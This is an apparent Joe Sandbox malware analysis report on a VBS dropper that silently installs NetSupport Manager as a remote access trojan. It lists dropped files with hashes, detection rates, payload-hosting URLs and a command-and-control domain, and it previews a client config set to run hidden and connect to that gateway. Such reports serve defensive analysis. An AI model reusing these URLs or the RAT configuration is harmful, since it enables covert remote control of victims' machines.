                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-heap-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-interlocked-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-libraryloader-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-localization-l1-2-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-memory-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-namedpipe-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processenvironment-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-1.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-profile-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-rtlsupport-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-string-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-2-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-sysinfo-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-timezone-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-util-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-conio-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-convert-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-environment-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-filesystem-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-heap-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-locale-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-math-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-multibyte-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-private-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-process-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-runtime-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-stdio-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-string-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-time-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-utility-l1-1-0.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dll | 4% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe | 12% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\concrt140.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dll | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\libcrypto-1_1.dll | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\libssl-1_1.dll | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100u.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc140u.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp100.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp140.dll | 4% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcr100.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sys | 4% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr2.sys | 2% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmexec.exe | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dll | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exe | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sys | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nssres.dll | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicapi.dll | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exe | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pcictl.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sys | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dll | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dll | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\remcmdstub.exe | 8% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\shfolder.dll | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exe | 3% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\ucrtbase.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\vccorlib140.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\vcruntime140.dll | 0% | ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe | 3% | ReversingLabs
                                No Antivirus matches
                                No Antivirus matches
                                Source | Detection | Scanner | Label | Link
                                http://www.pci.co.uk/supportsupport | 0% | Virustotal | | Browse
                                http://www.netsupportsoftware.com | 1% | Virustotal | | Browse
                                http://pesterbdd.com/images/Pester.png4 | 10% | Virustotal | | Browse
                                http://%s/testpage.htmwininet.dll%s:%sCredUIPromptForCredentialsWcredui.dll | 0% | Avira URL Cloud | safe
                                http://www.netsupportschool.com/tutor-assistant.asp111 | 0% | Avira URL Cloud | safe
                                http://www.netsupportsoftware.com | 0% | Avira URL Cloud | safe
                                http://pesterbdd.com/images/Pester.png4 | 0% | Avira URL Cloud | safe
                                http://www.pci.co.uk/supportsupport | 0% | Avira URL Cloud | safe
                                https://help.netsupportschool.com/%s-%s/Default.htmhttps://help.netsupportschool.com/%s-%s/Default.h | 0% | Avira URL Cloud | safe
                                http://127.0.0.1RESUMEPRINTING | 0% | Avira URL Cloud | safe
                                http://megaeth1337.duckdns.org:1773/b | 0% | Avira URL Cloud | safe
                                http://%s/favicon.icoshcore.dllGetDpiForMonitorPCI | 0% | Avira URL Cloud | safe
                                https://okolinabeauty.com/choh/Client32.ini | 0% | Avira URL Cloud | safe
                                https://netsupportschool.com/whats_newAn | 0% | Avira URL Cloud | safe
                                http://62.172.138.12/url_redirect.htm#The | 0% | Avira URL Cloud | safe
                                https://okolinabeauty.com/choh/NSM.lic | 0% | Avira URL Cloud | safe
                                http://www.netsupportsoftware.com/support/clients.asp?version=1400KEYSHOWCLOSEKEYSHOWSTOPKEYSHOWRESU | 0% | Avira URL Cloud | safe
                                http://localhost/weblock.htmForcePowerOffConfirmationDisablePrintSurveyAnswerCountStudentVolumeLockS | 0% | Avira URL Cloud | safe
                                http://megaeth1337.duckdns.org:1773/( | 0% | Avira URL Cloud | safe
                                https://provisionserver.domain/amtscsTechLogHotKeyPauseHotKeyEndScrapeShowApp225.16.8.69KeepAspectSe | 0% | Avira URL Cloud | safe
                                http://www.idk.co.jp | 0% | Avira URL Cloud | safe
                                http://megaeth1337.duckdns.org:1773/C | 0% | Avira URL Cloud | safe
                                https://ocsp.quovadisoffshore.com0 | 0% | Avira URL Cloud | safe
                                http://%s/gateway.htm | 0% | Avira URL Cloud | safe
                                http://www.flexerasoftware.com0 | 0% | Avira URL Cloud | safe
                                http://www.netsupportschool.com/tutor-assistant.asp | 0% | Avira URL Cloud | safe
                                http://www.netsupportsoftware.com4 | 0% | Avira URL Cloud | safe
                                http://megaeth1337.duckdns.org:1773/: | 0% | Avira URL Cloud | safe
                                http://megaeth1337.duckdns.org:1773/ | 0% | Avira URL Cloud | safe
                                http://www.pci.co.uk/support | 0% | Avira URL Cloud | safe
                                http://pesterbdd.com/images/Pester.png | 0% | Avira URL Cloud | safe
                                http://www.acer-group.com/public/index/privacy.htm%scountry.dat | 0% | Avira URL Cloud | safe
                                http://megaeth1337.duckdns.org:1773/Rs | 0% | Avira URL Cloud | safe
                                http://ocsp.thawte.com0 | 0% | Avira URL Cloud | safe
                                http://www.microsoft. | 0% | Avira URL Cloud | safe
                                https://www.netsupportschool.com/ios-android/111 | 0% | Avira URL Cloud | safe
                                http://www.netsupportsoftware.com/support | 0% | Avira URL Cloud | safe
                                http://megaeth1337.duckdns.org:1773/$ | 0% | Avira URL Cloud | safe
                                http://localhost/ApprovedWebList.htmPrintSurveyInternet6 | 0% | Avira URL Cloud | safe
                                http://megaeth1337.duckdns.org:1773/n | 0% | Avira URL Cloud | safe
                                https://okolinabeauty.com/choh/vrep.msi | 0% | Avira URL Cloud | safe
                                http://megaeth1337.duckdns.org:1773/f | 0% | Avira URL Cloud | safe
                                http://www.quovadis.bm0 | 0% | Avira URL Cloud | safe
                                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                geo.netsupportsoftware.com | 104.26.1.231 | true | false | | high
                                okolinabeauty.com | 176.126.113.166 | true | true | | unknown
                                megaeth1337.duckdns.org | 185.170.144.66 | true | true | | unknown
                                Name | Malicious | Antivirus Detection | Reputation
                                http://geo.netsupportsoftware.com/location/loca.asp | false | | high
                                https://okolinabeauty.com/choh/Client32.ini | true | Avira URL Cloud: safe | unknown
                                https://okolinabeauty.com/choh/NSM.lic | true | Avira URL Cloud: safe | unknown
                                https://okolinabeauty.com/choh/vrep.msi | true | Avira URL Cloud: safe | unknown
                                Name | Source | Malicious | Antivirus Detection | Reputation
00000020.00000003.115115628288.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000002.114307415040.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000003.114303592438.0000000002C5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
IP | Domain | Country | ASN | ASN Name | Malicious
176.126.113.166 | okolinabeauty.com | Ukraine | 9063 | SAARGATE-ASVSENETGmbHDE | true
104.26.1.231 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
185.170.144.66 | megaeth1337.duckdns.org | unknown | 59753 | VDWELLEREE | true
                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1561295
                                                                                      Start date and time:2024-11-23 02:51:27 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 15m 6s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                      Run name:Suspected VM Detection
                                                                                      Number of analysed new started processes analysed:39
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:1
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Sample name:Pyyidau.vbs
                                                                                      Detection:MAL
                                                                                      Classification:mal100.bank.troj.expl.evad.winVBS@62/246@4/3
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 66.7%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 98%
                                                                                      • Number of executed functions: 154
                                                                                      • Number of non-executed functions: 271
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .vbs
                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WmiPrvSE.exe, svchost.exe
                                                                                      • Execution Graph export aborted for target Pyyidau.vbs.exe, PID 5876 because it is empty
                                                                                      • Execution Graph export aborted for target msiexec.exe, PID 8392 because there are no executed functions
                                                                                      • Not all processes were analyzed, report is missing behavior information
                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
20:53:36 | API Interceptor | 28x Sleep call for process: Pyyidau.vbs.exe modified
20:53:57 | API Interceptor | 1x Sleep call for process: msiexec.exe modified
20:54:46 | API Interceptor | 3206598x Sleep call for process: client32.exe modified
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):42749
                                                                                      Entropy (8bit):5.77822458106707
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:fqjRjFBBtktktktktktktjoQeBG2XOcOgFmuW:CjFAQl2euXW
                                                                                      MD5:C8DEF2779B88FB297552F1A72FC8282E
                                                                                      SHA1:D4597B3FB32ABC8E9B12C1D8054884964029E7AC
                                                                                      SHA-256:B405853A4E87BB5AF78316A32507AF6EF573D44CE95C577AD8F7CE8E3F716296
                                                                                      SHA-512:2BF3E15DC98EFB4D7824EF9A6CA19194A421A3E45CA228B3FFE59CBA94414EB45AE2A5E41ACC788DD93B2E316D122E705B4B0C246EA5C24A68EAEA1F1F075D04
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Config.Msi\e6def9.rbs, Author: Joe Security
                                                                                      Preview:...@IXOS.@.....@..vY.@.....@.....@.....@.....@.....@......&.{CBB68368-7767-4CFF-B3E5-211488346702}..NetSupport Manager..vrep.msi.@.....@.....@.....@......ARPPRODUCTICON.exe..&.{8FA17BDF-C6BA-4483-AA65-62957D834D73}.....@.....@.....@.....@.......@.....@.....@.......@......NetSupport Manager......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....StopDrivers....CloseGatewayTrayIcon....CloseGatewayApp....ProcessComponents..Updating component registration..&.{68985C0A-F4D4-4570-AE52-E556EED30C8C}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{CBD15933-2EDA-4A68-B11B-B3A1E0540ABB}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{0C0D3B0B-63FD-42B8-9FCE-56A33E5FE94C}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{D69F2005-3C0D-4683-90A1-EC4B5AD43C4B}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{783CBD0A-FEA7-407C-B450-1E275B3563DB}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{6AB92F9D-58CE-4729-BE0F-FF3C1181ADC5}&.{CBB68368-7767-4CFF-B3
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):82400
                                                                                      Entropy (8bit):6.714981336409031
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:a6Y+3bZm8/vLk957pyPkD/bFRFpmPcW+gee/AjHG6ee/gjHB:a6Y+rQ8/Tk9Rp5zFpmPl+gepjm6eljh
                                                                                      MD5:F60CE9D311CEE59250BAFAC6E6F1593A
                                                                                      SHA1:4838E4FD7F855BA75C55D9D1AD56A87347E91ABA
                                                                                      SHA-256:5029A368137EF90609E81A7F691743C1804A5DBFC40AE65540DB4831FD2A2087
                                                                                      SHA-512:E4FDD1D011BAA90DBF17CB3BB0C02BF82B450ED153D45E511BEA03427607B51AFCF201E9EBC18E567D9F5F17531AABB1A70A4E594CE0D1AAEC5AD3D41C6CEF8E
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):833
                                                                                      Entropy (8bit):5.511102445378548
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:+BhzEPmPT8FVXR8piBlnxOoK1fXXfDH2ijr6cgEW3ZxA2U6L:+BtuK+VXypGlnxJK1fHfXj+cg3ZD
                                                                                      MD5:1F0F5E39677EEDA38AADC289DEBCC482
                                                                                      SHA1:57E5EA3A82BC22791D1B0317514EF179E8169FB7
                                                                                      SHA-256:7A8D6223702D4049C4106867A5D53370977F5CC59E48964CCB5C48EBB2CAA630
                                                                                      SHA-512:20BCA25C4405F8627F20AD14A692CED65F1B293B77C995F7969784A38F8CCA518F40117CF3907D7282019BA4C54531314361C2312466685BAB90709B4AAE234E
                                                                                      Malicious:false
                                                                                      Preview:0x2634664d....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..Password=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gskmode=0..GSK=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):25
                                                                                      Entropy (8bit):4.243856189774724
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:tekKKv0ov:JR8y
                                                                                      MD5:C05C19B006D57DD4C90785CBE5C7877B
                                                                                      SHA1:34BEEBB832E53E4A3B9B3349919689FDF1401151
                                                                                      SHA-256:00E0C629D5645C15DF66ADCF99E8A0A3E517D7A7876141AE7A752F0585EEC047
                                                                                      SHA-512:BEDE1E24476A12E9B1F29962254B19B357BFDFBE5C6EEC9A2FCA6C1B2105F4CEC1D5872F6BE269EF39D6E5CC542DC587EA9555EF87687BAC64B3FF0DE16C0F8C
                                                                                      Malicious:false
                                                                                      Preview:[Client]..RoomSpec=Eval..
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):104928
                                                                                      Entropy (8bit):6.462496520992136
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:Pm0oPFxNrTUEtzjHlBs/Z5GQFvSeGjreejq:loxrTUEtFBsPGIaemeN
                                                                                      MD5:0488F2B6A068F6FAD881A45E427068A2
                                                                                      SHA1:B1E6B587D1F1A18C3E8F324C06BDE36608DF11A2
                                                                                      SHA-256:E4227BED56D1EA54FE8D4A0D60F68C1B805433F5A083C889F1EBE61D5901654E
                                                                                      SHA-512:56A2615AA3BF101430830C6832E494B2448CF8BCE1DA850AC0A9F6D55304508851590D360666B8926369E1FA925514F544BD5BA24E02192113018B6869079499
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32Provider.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):3926
                                                                                      Entropy (8bit):5.282899777821006
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:IQIT9RO30TdADA/kAqJNdzzpd47J69Tb1UgzP5DrwBt2U7xwZViSdMD+cGrr1AP2:qTKcMAkLvX47JE1UgzJUtDiO+Lrr1As9
                                                                                      MD5:4D9E1C4B8A78F4C8D6CE5235D42C8F1E
                                                                                      SHA1:6BD13DC34A053F0F40A0D77241AA4BD1EB4DFC42
                                                                                      SHA-256:6D098726CBCDB392BC3A43D4D218072F5CADD4B82D83ADA87BCE65F7642AF602
                                                                                      SHA-512:52953FC6A3474A682436C17AD8308C83514AA20CFFD1844E78426EA809FAFC1F2A2FEDDB09BC7F4D12996728D5017C816CF58AFE3B7CE6B79DC2557BAD7564DE
                                                                                      Malicious:false
                                                                                      Preview:; Keyboard layout file for NetSupport Control..;..; Format of this file is:..; keyboard layout name..; special key mappings..; repeated as often as desired..;..; Special key mappings take the form:..; scancode=character scancode=character .....; where scancode is a hexadecimal number..; (if >= 80 hex, the SHIFTED key is mapped)..; (if >= 100 hex, the ALT Gr key is mapped)....Unmapped Keyboard..FE=x..UK enhanced (102 key) keyboard..83=" 84=. A8=@ 29=` A9=. 2B=# AB=~ 56=\ D6=|....US enhanced (102 key) keyboard..83=@ 84=# A8=" 29=` A9=~ 2B=\ AB=| 56=\ D6=|....German enhanced (102 key) keyboard..29=^ a9=. 103=. 84=. 104=. 88=/ 108={ 89=( 109=[ 8a=) 10a=] 8b== 10b=} 0c=. 8c=? 10c=\ 0d=. 8d=` 110=@ 112=. 15=z 95=Z 1a=. 9a=. 1b=+ 9b=* 11b=~ 27=. a7=. 28=. a8=. ab=' 56=< d6=> 156=| 2c=y ac=Y 132=. b3=; b4=: 35=- b5=_ ....French enhanced (102 key) keyboard..29=. 02=& 82=1 03=. 83=2 103=~ 04=" 84=3 104=# 05=' 85=4 105={ 06=( 86=5 106=[ 07=- 87=6 107=| 08=. 88=7 108=` 09=_ 89=8 109=\ 0A
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):186336
                                                                                      Entropy (8bit):7.03311119010921
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:ClXC3/npbt1b5Ooum6yWCmNc4OYZ/Y+ZhJbe8Djbeij6:aXC35t1UOi7Os3le8LeZ
                                                                                      MD5:3B6E06D0861D2D553111BBCB1783BCAD
                                                                                      SHA1:18B3AA65FCC2C4E067A3DC097E833BA5CC82EB40
                                                                                      SHA-256:5B4A2536FCC852D811A351BEF1583F7D5DB516D66474F86EB3766D7EA7AE4749
                                                                                      SHA-512:D80D2F7212A30DA7B625DAEADD64B07543059DDC1E016D650AB3E50A16C8F4BE4194F178D8CED65F6C4857A74C10DA6501E1958A94BEF0AE4529F6134ABBDD03
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):89568
                                                                                      Entropy (8bit):6.7180392406274745
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:l1rRVUJVO9WjSe8wkrau39b35akGnHf3nVv5Hjwi9RGeSee/OjHAee/+jHri:7w8r76fZ5Hjwi9R3Se3jgeXje
                                                                                      MD5:5720EBD42711018DA15E56216B4B9E11
                                                                                      SHA1:DEC04A1C9CAC50CC2EDEABC8B628EFA615A65D45
                                                                                      SHA-256:4F757A99F8DBB4BC31187140AD048F149CA61A1127923E6F08F6E77EDA8E97F8
                                                                                      SHA-512:D4FB17B218CB82AED5601578F94DF35D3C1A1690D402FCA978281CF6649CCF69C4487F151BE4C0ED2DB2EED716761B5B6CE27393B1A3F5ADAB28F99FA906A72A
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):117728
                                                                                      Entropy (8bit):6.195705433401619
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:ONMIm6T+oOVZ5gJhPci0sWjcdpqD+MilESrH8q5Ree/BjHWee/TjHw:ONXm6FAOV7pqD+DESrH8q5Regj2eGjQ
                                                                                      MD5:F574F3A16C358D73C5F8A17606E75EBF
                                                                                      SHA1:00D6002C8B2C4C6D9F8BEF02E169777E4B517CF5
                                                                                      SHA-256:7EC3DA30E73122F5B050D503CB2214537E90016EEC059F852230B4F1B87E1B08
                                                                                      SHA-512:1D1664DBAA8E4F086523D9D63B69E15BFF7B8C9CF047C1C964E40DA308957355F6CED2F19D0D57B3D4EE72250E653DA75196F804230C4CCC146ADB0984FEA035
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):616928
                                                                                      Entropy (8bit):6.723244642108574
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:cVqKnPyKX/gu8Vk3AZkUBEX9gGXiaxHwTcpqPqlu20n9h0hds0/qnrY9vkoBLEla:/cyysqFUY9vkCEswvUKZjI/8ZEjv3Lt
                                                                                      MD5:C666FD00B08757335E2F30CA0D6F63C2
                                                                                      SHA1:996891107C4F32A0062C6FA8C1741A8CD5C659EF
                                                                                      SHA-256:F61ACF95B9B9CBA2AAC856783CF1F2F486548F96CF21118161E40A08C9101E58
                                                                                      SHA-512:33B8D6893C4E370782AA922E1437BF1502D127059F86CA30DAEA3145B99B3459B7D6A1C3471608867CE91D873C1F0B376B550E5AC57BCB36732154C65124E2BA
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):240096
                                                                                      Entropy (8bit):6.812972915579879
                                                                                      Encrypted:false
